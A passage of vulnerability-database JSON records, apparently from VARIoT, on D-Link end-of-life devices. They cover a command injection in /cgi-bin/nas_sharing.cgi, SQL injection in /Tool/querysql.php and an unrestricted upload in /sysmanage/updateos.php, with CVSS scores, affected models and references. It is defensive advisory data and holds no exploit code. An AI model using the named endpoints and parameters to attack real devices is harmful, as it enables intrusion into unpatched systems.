"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-321:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-322l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-323:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-325_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-325:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-327l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-327l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-340l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-340l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-343:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-345:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-726-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1100-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1200-05_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1550-04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1550-04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"cve": "CVE-2024-3273",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2024-3273",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2024-3273",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2024-3273",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3273"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-3273",
"trust": 2.6
},
{
"db": "VULDB",
"id": "259284",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10383",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003105",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"id": "VAR-202404-0070",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6929112399999999
},
"last_update_date": "2024-06-05T23:17:51.328000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/netsecfish/dlink"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=sap10383"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.259284"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?submit.304661"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.259284"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-3273"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"date": "2024-04-04T01:15:50.387000",
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T06:09:00",
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"date": "2024-06-04T19:20:18.680000",
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0D-Link\u00a0Systems,\u00a0Inc.\u00a0 Command injection vulnerabilities in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
}
],
"trust": 0.8
}
}
VAR-202309-0942
Vulnerability from variot - Updated: 2024-06-05 23:11
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-8000 up to 20151231. This affects an unknown part of the file /Tool/querysql.php. The manipulation leads to SQL injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link Systems, Inc. Note that this summary names DAR-8000, whereas the affected_products and CPE data in the record below name DAR-7000; confirm the affected model against the vendor advisory listed in the record's external_ids (SAP10354).
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0942",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2015-12-31"
},
{
"model": "dar-7000",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dar-7000 firmware 2015-12-31 and earlier"
},
{
"model": "dar-7000",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dar-7000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2015-12-31",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"cve": "CVE-2023-5153",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-5153",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-5153",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5153",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-8000 up to 20151231. This affects an unknown part of the file /Tool/querysql.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link Systems, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5153"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-5153",
"trust": 2.6
},
{
"db": "VULDB",
"id": "240249",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-012958",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"id": "VAR-202309-0942",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-05T23:11:01.008000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-8000-10_sql_%20querysql.md"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?ctiid.240249"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.240249"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-5153"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"date": "2023-09-25T03:15:09.390000",
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-19T07:54:00",
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"date": "2024-06-04T19:18:09.793000",
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0dar-7000\u00a0 in the firmware \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
}
],
"trust": 0.8
}
}
VAR-202309-0932
Vulnerability from variot - Updated: 2024-06-05 23:11
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0932",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
},
{
"model": "dar-8000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
